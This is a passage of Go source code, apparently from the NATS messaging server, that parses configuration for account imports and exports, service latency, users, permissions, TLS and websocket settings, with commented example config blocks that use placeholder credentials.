if err := service.acc.AddServiceExportWithResponse(service.sub, service.rt, accounts); err != nil {
msg := fmt.Sprintf("Error adding service export %q: %v", service.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
if service.rthr != 0 {
// Response threshold was set in options.
if err := service.acc.SetServiceExportResponseThreshold(service.sub, service.rthr); err != nil {
msg := fmt.Sprintf("Error adding service export response threshold for %q: %v", service.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
}
if service.lat != nil {
// System accounts are on by default, so just make sure we have not opted out.
if opts.NoSystemAccount {
msg := fmt.Sprintf("Error adding service latency sampling for %q: %v", service.sub, ErrNoSysAccount.Error())
*errors = append(*errors, &configErr{tk, msg})
continue
}
if err := service.acc.TrackServiceExportWithSampling(service.sub, service.lat.subject, int(service.lat.sampling)); err != nil {
msg := fmt.Sprintf("Error adding service latency sampling for %q on subject %q: %v", service.sub, service.lat.subject, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
}
}
for _, stream := range importStreams {
ta := am[stream.an]
if ta == nil {
msg := fmt.Sprintf("%q account not defined for stream import", stream.an)
*errors = append(*errors, &configErr{tk, msg})
continue
}
if stream.pre != "" {
if err := stream.acc.AddStreamImport(ta, stream.sub, stream.pre); err != nil {
msg := fmt.Sprintf("Error adding stream import %q: %v", stream.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
} else {
if err := stream.acc.AddMappedStreamImport(ta, stream.sub, stream.to); err != nil {
msg := fmt.Sprintf("Error adding stream import %q: %v", stream.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
}
}
for _, service := range importServices {
ta := am[service.an]
if ta == nil {
msg := fmt.Sprintf("%q account not defined for service import", service.an)
*errors = append(*errors, &configErr{tk, msg})
continue
}
if service.to == "" {
service.to = service.sub
}
if err := service.acc.AddServiceImport(ta, service.to, service.sub); err != nil {
msg := fmt.Sprintf("Error adding service import %q: %v", service.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
if err := service.acc.SetServiceImportSharing(ta, service.sub, service.share); err != nil {
msg := fmt.Sprintf("Error setting service import sharing %q: %v", service.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
}
return nil
}
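// Illustrative sketch (assumption, not taken from this file): an accounts block
// exercising the keys handled above (users, exports, imports). Account names,
// subjects, and credentials are made-up placeholders.
// e.g.
//   accounts {
//     A {
//       users = [ {user: a, password: a} ]
//       exports = [ {service: "a.help"} ]
//     }
//     B {
//       users = [ {user: b, password: b} ]
//       imports = [ {service: {account: A, subject: "a.help"}, to: "help"} ]
//     }
//   }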
// Parse the account exports
func parseAccountExports(v interface{}, acc *Account, errors, warnings *[]error) ([]*export, []*export, error) {
var lt token
defer convertPanicToErrorList(&lt, errors)
// This should be an array of objects/maps.
tk, v := unwrapValue(v, &lt)
ims, ok := v.([]interface{})
if !ok {
return nil, nil, &configErr{tk, fmt.Sprintf("Exports should be an array, got %T", v)}
}
var services []*export
var streams []*export
for _, v := range ims {
// Should have stream or service
stream, service, err := parseExportStreamOrService(v, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
if service != nil {
service.acc = acc
services = append(services, service)
}
if stream != nil {
stream.acc = acc
streams = append(streams, stream)
}
}
return streams, services, nil
}
// Parse the account imports
func parseAccountImports(v interface{}, acc *Account, errors, warnings *[]error) ([]*importStream, []*importService, error) {
var lt token
defer convertPanicToErrorList(&lt, errors)
// This should be an array of objects/maps.
tk, v := unwrapValue(v, &lt)
ims, ok := v.([]interface{})
if !ok {
return nil, nil, &configErr{tk, fmt.Sprintf("Imports should be an array, got %T", v)}
}
var services []*importService
var streams []*importStream
svcSubjects := map[string]*importService{}
for _, v := range ims {
// Should have stream or service
stream, service, err := parseImportStreamOrService(v, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
if service != nil {
if dup := svcSubjects[service.to]; dup != nil {
tk, _ := unwrapValue(v, &lt)
err := &configErr{tk,
fmt.Sprintf("Duplicate service import subject %q, previously used in import for account %q, subject %q",
service.to, dup.an, dup.sub)}
*errors = append(*errors, err)
continue
}
svcSubjects[service.to] = service
service.acc = acc
services = append(services, service)
}
if stream != nil {
stream.acc = acc
streams = append(streams, stream)
}
}
return streams, services, nil
}
// Helper to parse an embedded account description for imported services or streams.
func parseAccount(v map[string]interface{}, errors, warnings *[]error) (string, string, error) {
var lt token
defer convertPanicToErrorList(&lt, errors)
var accountName, subject string
for mk, mv := range v {
tk, mv := unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "account":
accountName = mv.(string)
case "subject":
subject = mv.(string)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
}
}
return accountName, subject, nil
}
// Parse an export stream or service.
// e.g.
// {stream: "public.>"} # No accounts means public.
// {stream: "synadia.private.>", accounts: [cncf, natsio]}
// {service: "pub.request"} # No accounts means public.
// {service: "pub.special.request", accounts: [nats.io]}
func parseExportStreamOrService(v interface{}, errors, warnings *[]error) (*export, *export, error) {
var (
curStream *export
curService *export
accounts []string
rt ServiceRespType
rtSeen bool
rtToken token
lat *serviceLatency
threshSeen bool
thresh time.Duration
latToken token
lt token
)
defer convertPanicToErrorList(&lt, errors)
tk, v := unwrapValue(v, &lt)
vv, ok := v.(map[string]interface{})
if !ok {
return nil, nil, &configErr{tk, fmt.Sprintf("Export Items should be a map with type entry, got %T", v)}
}
for mk, mv := range vv {
tk, mv := unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "stream":
if curService != nil {
err := &configErr{tk, fmt.Sprintf("Detected stream %q but already saw a service", mv)}
*errors = append(*errors, err)
continue
}
if rtToken != nil {
err := &configErr{rtToken, "Detected response directive on non-service"}
*errors = append(*errors, err)
continue
}
if latToken != nil {
err := &configErr{latToken, "Detected latency directive on non-service"}
*errors = append(*errors, err)
continue
}
mvs, ok := mv.(string)
if !ok {
err := &configErr{tk, fmt.Sprintf("Expected stream name to be string, got %T", mv)}
*errors = append(*errors, err)
continue
}
curStream = &export{sub: mvs}
if accounts != nil {
curStream.accs = accounts
}
case "service":
if curStream != nil {
err := &configErr{tk, fmt.Sprintf("Detected service %q but already saw a stream", mv)}
*errors = append(*errors, err)
continue
}
mvs, ok := mv.(string)
if !ok {
err := &configErr{tk, fmt.Sprintf("Expected service name to be string, got %T", mv)}
*errors = append(*errors, err)
continue
}
curService = &export{sub: mvs}
if accounts != nil {
curService.accs = accounts
}
if rtSeen {
curService.rt = rt
}
if lat != nil {
curService.lat = lat
}
if threshSeen {
curService.rthr = thresh
}
case "response", "response_type":
if rtSeen {
err := &configErr{tk, "Duplicate response type definition"}
*errors = append(*errors, err)
continue
}
rtSeen = true
rtToken = tk
mvs, ok := mv.(string)
if !ok {
err := &configErr{tk, fmt.Sprintf("Expected response type to be string, got %T", mv)}
*errors = append(*errors, err)
continue
}
switch strings.ToLower(mvs) {
case "single", "singleton":
rt = Singleton
case "stream":
rt = Streamed
case "chunk", "chunked":
rt = Chunked
default:
err := &configErr{tk, fmt.Sprintf("Unknown response type: %q", mvs)}
*errors = append(*errors, err)
continue
}
if curService != nil {
curService.rt = rt
}
if curStream != nil {
err := &configErr{tk, "Detected response directive on non-service"}
*errors = append(*errors, err)
}
case "threshold", "response_threshold", "response_max_time", "response_time":
if threshSeen {
err := &configErr{tk, "Duplicate response threshold detected"}
*errors = append(*errors, err)
continue
}
threshSeen = true
mvs, ok := mv.(string)
if !ok {
err := &configErr{tk, fmt.Sprintf("Expected response threshold to be a parseable time duration, got %T", mv)}
*errors = append(*errors, err)
continue
}
var err error
thresh, err = time.ParseDuration(mvs)
if err != nil {
err := &configErr{tk, fmt.Sprintf("Expected response threshold to be a parseable time duration, got %q", mvs)}
*errors = append(*errors, err)
continue
}
if curService != nil {
curService.rthr = thresh
}
if curStream != nil {
err := &configErr{tk, "Detected response directive on non-service"}
*errors = append(*errors, err)
}
case "accounts":
for _, iv := range mv.([]interface{}) {
_, mv := unwrapValue(iv, &lt)
accounts = append(accounts, mv.(string))
}
if curStream != nil {
curStream.accs = accounts
} else if curService != nil {
curService.accs = accounts
}
case "latency":
latToken = tk
var err error
lat, err = parseServiceLatency(tk, mv)
if err != nil {
*errors = append(*errors, err)
continue
}
if curStream != nil {
err = &configErr{tk, "Detected latency directive on non-service"}
*errors = append(*errors, err)
continue
}
if curService != nil {
curService.lat = lat
}
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
}
}
return curStream, curService, nil
}
// parseServiceLatency returns a latency config block.
func parseServiceLatency(root token, v interface{}) (l *serviceLatency, retErr error) {
var lt token
defer convertPanicToError(&lt, &retErr)
if subject, ok := v.(string); ok {
return &serviceLatency{
subject: subject,
sampling: DEFAULT_SERVICE_LATENCY_SAMPLING,
}, nil
}
latency, ok := v.(map[string]interface{})
if !ok {
return nil, &configErr{token: root,
reason: fmt.Sprintf("Expected latency entry to be a map/struct or string, got %T", v)}
}
sl := serviceLatency{
sampling: DEFAULT_SERVICE_LATENCY_SAMPLING,
}
// Read sampling value.
if v, ok := latency["sampling"]; ok {
tk, v := unwrapValue(v, &lt)
header := false
var sample int64
switch vv := v.(type) {
case int64:
// Sample is an int, like 50.
sample = vv
case string:
// Sample is a string, like "50%".
if strings.ToLower(strings.TrimSpace(vv)) == "headers" {
header = true
sample = 0
break
}
s := strings.TrimSuffix(vv, "%")
n, err := strconv.Atoi(s)
if err != nil {
return nil, &configErr{token: tk,
reason: fmt.Sprintf("Failed to parse latency sample: %v", err)}
}
sample = int64(n)
default:
return nil, &configErr{token: tk,
reason: fmt.Sprintf("Expected latency sample to be a string or map/struct, got %T", v)}
}
if !header {
if sample < 1 || sample > 100 {
return nil, &configErr{token: tk,
reason: ErrBadSampling.Error()}
}
}
sl.sampling = int8(sample)
}
// Read subject value.
v, ok = latency["subject"]
if !ok {
return nil, &configErr{token: root,
reason: "Latency subject required, but missing"}
}
tk, v := unwrapValue(v, &lt)
subject, ok := v.(string)
if !ok {
return nil, &configErr{token: tk,
reason: fmt.Sprintf("Expected latency subject to be a string, got %T", subject)}
}
sl.subject = subject
return &sl, nil
}
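// Illustrative sketch (assumption, not taken from this file): latency may be a bare
// subject string or a map with "sampling" and "subject", per the parser above.
// Subjects and the sampling rate are made-up placeholders.
// e.g.
//   exports = [
//     {service: "a.help", latency: "latency.a.help"}
//     {service: "a.slow", latency: {sampling: 50%, subject: "latency.a.slow"}}
//   ]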
// Parse an import stream or service.
// e.g.
// {stream: {account: "synadia", subject:"public.synadia"}, prefix: "imports.synadia"}
// {stream: {account: "synadia", subject:"synadia.private.*"}}
// {service: {account: "synadia", subject: "pub.special.request"}, to: "synadia.request"}
func parseImportStreamOrService(v interface{}, errors, warnings *[]error) (*importStream, *importService, error) {
var (
curStream *importStream
curService *importService
pre, to string
share bool
lt token
)
defer convertPanicToErrorList(&lt, errors)
tk, mv := unwrapValue(v, &lt)
vv, ok := mv.(map[string]interface{})
if !ok {
return nil, nil, &configErr{tk, fmt.Sprintf("Import Items should be a map with type entry, got %T", mv)}
}
for mk, mv := range vv {
tk, mv := unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "stream":
if curService != nil {
err := &configErr{tk, "Detected stream but already saw a service"}
*errors = append(*errors, err)
continue
}
ac, ok := mv.(map[string]interface{})
if !ok {
err := &configErr{tk, fmt.Sprintf("Stream entry should be an account map, got %T", mv)}
*errors = append(*errors, err)
continue
}
// Make sure this is a map with account and subject
accountName, subject, err := parseAccount(ac, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
if accountName == "" || subject == "" {
err := &configErr{tk, "Expect an account name and a subject"}
*errors = append(*errors, err)
continue
}
curStream = &importStream{an: accountName, sub: subject}
if to != "" {
curStream.to = to
}
if pre != "" {
curStream.pre = pre
}
case "service":
if curStream != nil {
err := &configErr{tk, "Detected service but already saw a stream"}
*errors = append(*errors, err)
continue
}
ac, ok := mv.(map[string]interface{})
if !ok {
err := &configErr{tk, fmt.Sprintf("Service entry should be an account map, got %T", mv)}
*errors = append(*errors, err)
continue
}
// Make sure this is a map with account and subject
accountName, subject, err := parseAccount(ac, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
if accountName == "" || subject == "" {
err := &configErr{tk, "Expect an account name and a subject"}
*errors = append(*errors, err)
continue
}
curService = &importService{an: accountName, sub: subject}
if to != "" {
curService.to = to
} else {
curService.to = subject
}
curService.share = share
case "prefix":
pre = mv.(string)
if curStream != nil {
curStream.pre = pre
}
case "to":
to = mv.(string)
if curService != nil {
curService.to = to
}
if curStream != nil {
curStream.to = to
if curStream.pre != "" {
err := &configErr{tk, "Stream import can not have a 'prefix' and a 'to' property"}
*errors = append(*errors, err)
continue
}
}
case "share":
share = mv.(bool)
if curService != nil {
curService.share = share
}
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
}
}
return curStream, curService, nil
}
// Apply permission defaults to users/nkeyuser that don't have their own.
func applyDefaultPermissions(users []*User, nkeys []*NkeyUser, defaultP *Permissions) {
if defaultP == nil {
return
}
for _, user := range users {
if user.Permissions == nil {
user.Permissions = defaultP
}
}
for _, user := range nkeys {
if user.Permissions == nil {
user.Permissions = defaultP
}
}
}
// Helper function to parse Authorization configs.
func parseAuthorization(v interface{}, opts *Options, errors *[]error, warnings *[]error) (*authorization, error) {
var (
am map[string]interface{}
tk token
lt token
auth = &authorization{}
)
defer convertPanicToErrorList(&lt, errors)
_, v = unwrapValue(v, &lt)
am = v.(map[string]interface{})
for mk, mv := range am {
tk, mv = unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "user", "username":
auth.user = mv.(string)
case "pass", "password":
auth.pass = mv.(string)
case "token":
auth.token = mv.(string)
case "timeout":
at := float64(1)
switch mv := mv.(type) {
case int64:
at = float64(mv)
case float64:
at = mv
}
auth.timeout = at
case "users":
nkeys, users, err := parseUsers(tk, opts, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
auth.users = users
auth.nkeys = nkeys
case "default_permission", "default_permissions", "permissions":
permissions, err := parseUserPermissions(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
auth.defaultPermissions = permissions
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
continue
}
applyDefaultPermissions(auth.users, auth.nkeys, auth.defaultPermissions)
}
return auth, nil
}
// Helper function to parse multiple users array with optional permissions.
func parseUsers(mv interface{}, opts *Options, errors *[]error, warnings *[]error) ([]*NkeyUser, []*User, error) {
var (
tk token
lt token
keys []*NkeyUser
users = []*User{}
)
defer convertPanicToErrorList(&lt, errors)
tk, mv = unwrapValue(mv, &lt)
// Make sure we have an array
uv, ok := mv.([]interface{})
if !ok {
return nil, nil, &configErr{tk, fmt.Sprintf("Expected users field to be an array, got %v", mv)}
}
for _, u := range uv {
tk, u = unwrapValue(u, &lt)
// Check its a map/struct
um, ok := u.(map[string]interface{})
if !ok {
err := &configErr{tk, fmt.Sprintf("Expected user entry to be a map/struct, got %v", u)}
*errors = append(*errors, err)
continue
}
var (
user = &User{}
nkey = &NkeyUser{}
perms *Permissions
err error
)
for k, v := range um {
// Also needs to unwrap first
tk, v = unwrapValue(v, &lt)
switch strings.ToLower(k) {
case "nkey":
nkey.Nkey = v.(string)
case "user", "username":
user.Username = v.(string)
case "pass", "password":
user.Password = v.(string)
case "permission", "permissions", "authorization":
perms, err = parseUserPermissions(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
case "allowed_connection_types", "connection_types", "clients":
cts := parseAllowedConnectionTypes(tk, &lt, v, errors, warnings)
nkey.AllowedConnectionTypes = cts
user.AllowedConnectionTypes = cts
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: k,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
// Place perms if we have them.
if perms != nil {
// nkey takes precedent.
if nkey.Nkey != "" {
nkey.Permissions = perms
} else {
user.Permissions = perms
}
}
// Check to make sure we have at least an nkey or username <password> defined.
if nkey.Nkey == "" && user.Username == "" {
return nil, nil, &configErr{tk, "User entry requires a user"}
} else if nkey.Nkey != "" {
// Make sure the nkey a proper public nkey for a user..
if !nkeys.IsValidPublicUserKey(nkey.Nkey) {
return nil, nil, &configErr{tk, "Not a valid public nkey for a user"}
}
// If we have user or password defined here that is an error.
if user.Username != "" || user.Password != "" {
return nil, nil, &configErr{tk, "Nkey users do not take usernames or passwords"}
}
keys = append(keys, nkey)
} else {
users = append(users, user)
}
}
return keys, users, nil
}
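// Illustrative sketch (assumption, not taken from this file): a users array with
// the fields handled above. Names, passwords, and the nkey are placeholders only.
// e.g.
//   users = [
//     {user: alice, password: s3cr3t, permissions: {publish: "alice.>"}}
//     {nkey: "U...PLACEHOLDER_PUBLIC_USER_NKEY..."}
//   ]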
func parseAllowedConnectionTypes(tk token, lt *token, mv interface{}, errors *[]error, warnings *[]error) map[string]struct{} {
cts, err := parseStringArray("allowed connection types", tk, lt, mv, errors, warnings)
// If error, it has already been added to the `errors` array, simply return
if err != nil {
return nil
}
m, err := convertAllowedConnectionTypes(cts)
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
}
return m
}
// Helper function to parse user/account permissions
func parseUserPermissions(mv interface{}, errors, warnings *[]error) (*Permissions, error) {
var (
tk token
lt token
p = &Permissions{}
)
defer convertPanicToErrorList(&lt, errors)
tk, mv = unwrapValue(mv, &lt)
pm, ok := mv.(map[string]interface{})
if !ok {
return nil, &configErr{tk, fmt.Sprintf("Expected permissions to be a map/struct, got %+v", mv)}
}
for k, v := range pm {
tk, mv = unwrapValue(v, &lt)
switch strings.ToLower(k) {
// For routes:
// Import is Publish
// Export is Subscribe
case "pub", "publish", "import":
perms, err := parseVariablePermissions(mv, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
p.Publish = perms
case "sub", "subscribe", "export":
perms, err := parseVariablePermissions(mv, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
p.Subscribe = perms
case "publish_allow_responses", "allow_responses":
rp := &ResponsePermission{
MaxMsgs: DEFAULT_ALLOW_RESPONSE_MAX_MSGS,
Expires: DEFAULT_ALLOW_RESPONSE_EXPIRATION,
}
// Try boolean first
responses, ok := mv.(bool)
if ok {
if responses {
p.Response = rp
}
} else {
p.Response = parseAllowResponses(v, errors, warnings)
}
if p.Response != nil {
if p.Publish == nil {
p.Publish = &SubjectPermission{}
}
if p.Publish.Allow == nil {
// We turn off the blanket allow statement.
p.Publish.Allow = []string{}
}
}
default:
if !tk.IsUsedVariable() {
err := &configErr{tk, fmt.Sprintf("Unknown field %q parsing permissions", k)}
*errors = append(*errors, err)
}
}
}
return p, nil
}
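// Illustrative sketch (assumption, not taken from this file): a permissions map
// using the keys handled above. Subjects and limits are made-up placeholders.
// e.g.
//   permissions: {
//     publish: {allow: ["orders.>"], deny: ["orders.admin.>"]}
//     subscribe: "orders.*.status"
//     allow_responses: {max: 5, expires: "1m"}
//   }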
// Top level parser for authorization configurations.
func parseVariablePermissions(v interface{}, errors, warnings *[]error) (*SubjectPermission, error) {
switch vv := v.(type) {
case map[string]interface{}:
// New style with allow and/or deny properties.
return parseSubjectPermission(vv, errors, warnings)
default:
// Old style
return parseOldPermissionStyle(v, errors, warnings)
}
}
// Helper function to parse subject singletons and/or arrays
func parseSubjects(v interface{}, errors, warnings *[]error) ([]string, error) {
var lt token
defer convertPanicToErrorList(&lt, errors)
tk, v := unwrapValue(v, &lt)
var subjects []string
switch vv := v.(type) {
case string:
subjects = append(subjects, vv)
case []string:
subjects = vv
case []interface{}:
for _, i := range vv {
tk, i := unwrapValue(i, &lt)
subject, ok := i.(string)
if !ok {
return nil, &configErr{tk, "Subject in permissions array cannot be cast to string"}
}
subjects = append(subjects, subject)
}
default:
return nil, &configErr{tk, fmt.Sprintf("Expected subject permissions to be a subject, or array of subjects, got %T", v)}
}
if err := checkSubjectArray(subjects); err != nil {
return nil, &configErr{tk, err.Error()}
}
return subjects, nil
}
// Helper function to parse a ResponsePermission.
func parseAllowResponses(v interface{}, errors, warnings *[]error) *ResponsePermission {
var lt token
defer convertPanicToErrorList(&lt, errors)
tk, v := unwrapValue(v, &lt)
// Check if this is a map.
pm, ok := v.(map[string]interface{})
if !ok {
err := &configErr{tk, "error parsing response permissions, expected a boolean or a map"}
*errors = append(*errors, err)
return nil
}
rp := &ResponsePermission{
MaxMsgs: DEFAULT_ALLOW_RESPONSE_MAX_MSGS,
Expires: DEFAULT_ALLOW_RESPONSE_EXPIRATION,
}
for k, v := range pm {
tk, v = unwrapValue(v, &lt)
switch strings.ToLower(k) {
case "max", "max_msgs", "max_messages", "max_responses":
max := int(v.(int64))
// Negative values are accepted (mean infinite), and 0
// means default value (set above).
if max != 0 {
rp.MaxMsgs = max
}
case "expires", "expiration", "ttl":
wd, ok := v.(string)
if ok {
ttl, err := time.ParseDuration(wd)
if err != nil {
err := &configErr{tk, fmt.Sprintf("error parsing expires: %v", err)}
*errors = append(*errors, err)
return nil
}
// Negative values are accepted (mean infinite), and 0
// means default value (set above).
if ttl != 0 {
rp.Expires = ttl
}
} else {
err := &configErr{tk, "error parsing expires, not a duration string"}
*errors = append(*errors, err)
return nil
}
default:
if !tk.IsUsedVariable() {
err := &configErr{tk, fmt.Sprintf("Unknown field %q parsing permissions", k)}
*errors = append(*errors, err)
}
}
}
return rp
}
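// Illustrative sketch (assumption, not taken from this file): allow_responses given
// as a map, using the keys handled above. Values are made-up placeholders.
// e.g.
//   allow_responses: {max_msgs: 10, expires: "30s"}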
// Helper function to parse old style authorization configs.
func parseOldPermissionStyle(v interface{}, errors, warnings *[]error) (*SubjectPermission, error) {
subjects, err := parseSubjects(v, errors, warnings)
if err != nil {
return nil, err
}
return &SubjectPermission{Allow: subjects}, nil
}
// Helper function to parse new style authorization into a SubjectPermission with Allow and Deny.
func parseSubjectPermission(v interface{}, errors, warnings *[]error) (*SubjectPermission, error) {
var lt token
defer convertPanicToErrorList(&lt, errors)
m := v.(map[string]interface{})
if len(m) == 0 {
return nil, nil
}
p := &SubjectPermission{}
for k, v := range m {
tk, _ := unwrapValue(v, &lt)
switch strings.ToLower(k) {
case "allow":
subjects, err := parseSubjects(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
p.Allow = subjects
case "deny":
subjects, err := parseSubjects(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
p.Deny = subjects
default:
if !tk.IsUsedVariable() {
err := &configErr{tk, fmt.Sprintf("Unknown field name %q parsing subject permissions, only 'allow' or 'deny' are permitted", k)}
*errors = append(*errors, err)
}
}
}
return p, nil
}
// Helper function to validate subjects, etc for account permissioning.
func checkSubjectArray(sa []string) error {
for _, s := range sa {
if !IsValidSubject(s) {
return fmt.Errorf("subject %q is not a valid subject", s)
}
}
return nil
}
// PrintTLSHelpAndDie prints TLS usage and exits.
func PrintTLSHelpAndDie() {
fmt.Printf("%s", tlsUsage)
for k := range cipherMap {
fmt.Printf(" %s\n", k)
}
fmt.Printf("\nAvailable curve preferences include:\n")
for k := range curvePreferenceMap {
fmt.Printf(" %s\n", k)
}
os.Exit(0)
}
func parseCipher(cipherName string) (uint16, error) {
cipher, exists := cipherMap[cipherName]
if !exists {
return 0, fmt.Errorf("unrecognized cipher %s", cipherName)
}
return cipher, nil
}
func parseCurvePreferences(curveName string) (tls.CurveID, error) {
curve, exists := curvePreferenceMap[curveName]
if !exists {
return 0, fmt.Errorf("unrecognized curve preference %s", curveName)
}
return curve, nil
}
// Helper function to parse TLS configs.
func parseTLS(v interface{}, isClientCtx bool) (t *TLSConfigOpts, retErr error) {
var (
tlsm map[string]interface{}
tc = TLSConfigOpts{}
lt token
)
defer convertPanicToError(&lt, &retErr)
_, v = unwrapValue(v, &lt)
tlsm = v.(map[string]interface{})
for mk, mv := range tlsm {
tk, mv := unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "cert_file":
certFile, ok := mv.(string)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'cert_file' to be filename"}
}
tc.CertFile = certFile
case "key_file":
keyFile, ok := mv.(string)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'key_file' to be filename"}
}
tc.KeyFile = keyFile
case "ca_file":
caFile, ok := mv.(string)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'ca_file' to be filename"}
}
tc.CaFile = caFile
case "insecure":
insecure, ok := mv.(bool)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'insecure' to be a boolean"}
}
tc.Insecure = insecure
case "verify":
verify, ok := mv.(bool)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'verify' to be a boolean"}
}
tc.Verify = verify
case "verify_and_map":
verify, ok := mv.(bool)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'verify_and_map' to be a boolean"}
}
if verify {
tc.Verify = verify
}
tc.Map = verify
case "verify_cert_and_check_known_urls":
verify, ok := mv.(bool)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'verify_cert_and_check_known_urls' to be a boolean"}
}
if verify && isClientCtx {
return nil, &configErr{tk, "verify_cert_and_check_known_urls not supported in this context"}
}
if verify {
tc.Verify = verify
}
tc.TLSCheckKnownURLs = verify
case "cipher_suites":
ra := mv.([]interface{})
if len(ra) == 0 {
return nil, &configErr{tk, "error parsing tls config, 'cipher_suites' cannot be empty"}
}
tc.Ciphers = make([]uint16, 0, len(ra))
for _, r := range ra {
tk, r := unwrapValue(r, &lt)
cipher, err := parseCipher(r.(string))
if err != nil {
return nil, &configErr{tk, err.Error()}
}
tc.Ciphers = append(tc.Ciphers, cipher)
}
case "curve_preferences":
ra := mv.([]interface{})
if len(ra) == 0 {
return nil, &configErr{tk, "error parsing tls config, 'curve_preferences' cannot be empty"}
}
tc.CurvePreferences = make([]tls.CurveID, 0, len(ra))
for _, r := range ra {
tk, r := unwrapValue(r, &lt)
cps, err := parseCurvePreferences(r.(string))
if err != nil {
return nil, &configErr{tk, err.Error()}
}
tc.CurvePreferences = append(tc.CurvePreferences, cps)
}
case "timeout":
at := float64(0)
switch mv := mv.(type) {
case int64:
at = float64(mv)
case float64:
at = mv
}
tc.Timeout = at
default:
return nil, &configErr{tk, fmt.Sprintf("error parsing tls config, unknown field [%q]", mk)}
}
}
// If cipher suites were not specified then use the defaults
if tc.Ciphers == nil {
tc.Ciphers = defaultCipherSuites()
}
// If curve preferences were not specified, then use the defaults
if tc.CurvePreferences == nil {
tc.CurvePreferences = defaultCurvePreferences()
}
return &tc, nil
}
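// Illustrative sketch (assumption, not taken from this file): a tls block using the
// fields handled above. File paths and the timeout are made-up placeholders.
// e.g.
//   tls {
//     cert_file: "./server-cert.pem"
//     key_file:  "./server-key.pem"
//     ca_file:   "./ca.pem"
//     verify:    true
//     timeout:   2
//   }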
func parseSimpleAuth(v interface{}, errors *[]error, warnings *[]error) *authorization {
var (
am map[string]interface{}
tk token
lt token
auth = &authorization{}
)
defer convertPanicToErrorList(&lt, errors)
_, v = unwrapValue(v, &lt)
am = v.(map[string]interface{})
for mk, mv := range am {
tk, mv = unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "user", "username":
auth.user = mv.(string)
case "pass", "password":
auth.pass = mv.(string)
case "token":
auth.token = mv.(string)
case "timeout":
at := float64(1)
switch mv := mv.(type) {
case int64:
at = float64(mv)
case float64:
at = mv
}
auth.timeout = at
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
continue
}
}
return auth
}
func parseStringArray(fieldName string, tk token, lt *token, mv interface{}, errors *[]error, warnings *[]error) ([]string, error) {
switch mv := mv.(type) {
case string:
return []string{mv}, nil
case []interface{}:
strs := make([]string, 0, len(mv))
for _, val := range mv {
tk, val = unwrapValue(val, lt)
if str, ok := val.(string); ok {
strs = append(strs, str)
} else {
err := &configErr{tk, fmt.Sprintf("error parsing %s: unsupported type in array %T", fieldName, val)}
*errors = append(*errors, err)
continue
}
}
return strs, nil
default:
err := &configErr{tk, fmt.Sprintf("error parsing %s: unsupported type %T", fieldName, mv)}
*errors = append(*errors, err)
return nil, err
}
}
func parseWebsocket(v interface{}, o *Options, errors *[]error, warnings *[]error) error {
var lt token
defer convertPanicToErrorList(&lt, errors)
tk, v := unwrapValue(v, &lt)
gm, ok := v.(map[string]interface{})
if !ok {
return &configErr{tk, fmt.Sprintf("Expected websocket to be a map, got %T", v)}
}
for mk, mv := range gm {
// Again, unwrap token value if line check is required.
tk, mv = unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "listen":
hp, err := parseListen(mv)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
o.Websocket.Host = hp.host
o.Websocket.Port = hp.port
case "port":
o.Websocket.Port = int(mv.(int64))
case "host", "net":
o.Websocket.Host = mv.(string)
case "advertise":
o.Websocket.Advertise = mv.(string)
case "no_tls":
o.Websocket.NoTLS = mv.(bool)
case "tls":
tc, err := parseTLS(tk, true)
if err != nil {
*errors = append(*errors, err)
continue
}
if o.Websocket.TLSConfig, err = GenTLSConfig(tc); err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
o.Websocket.TLSMap = tc.Map
case "same_origin":
o.Websocket.SameOrigin = mv.(bool)
case "allowed_origins", "allowed_origin", "allow_origins", "allow_origin", "origins", "origin":
o.Websocket.AllowedOrigins, _ = parseStringArray("allowed origins", tk, &lt, mv, errors, warnings)
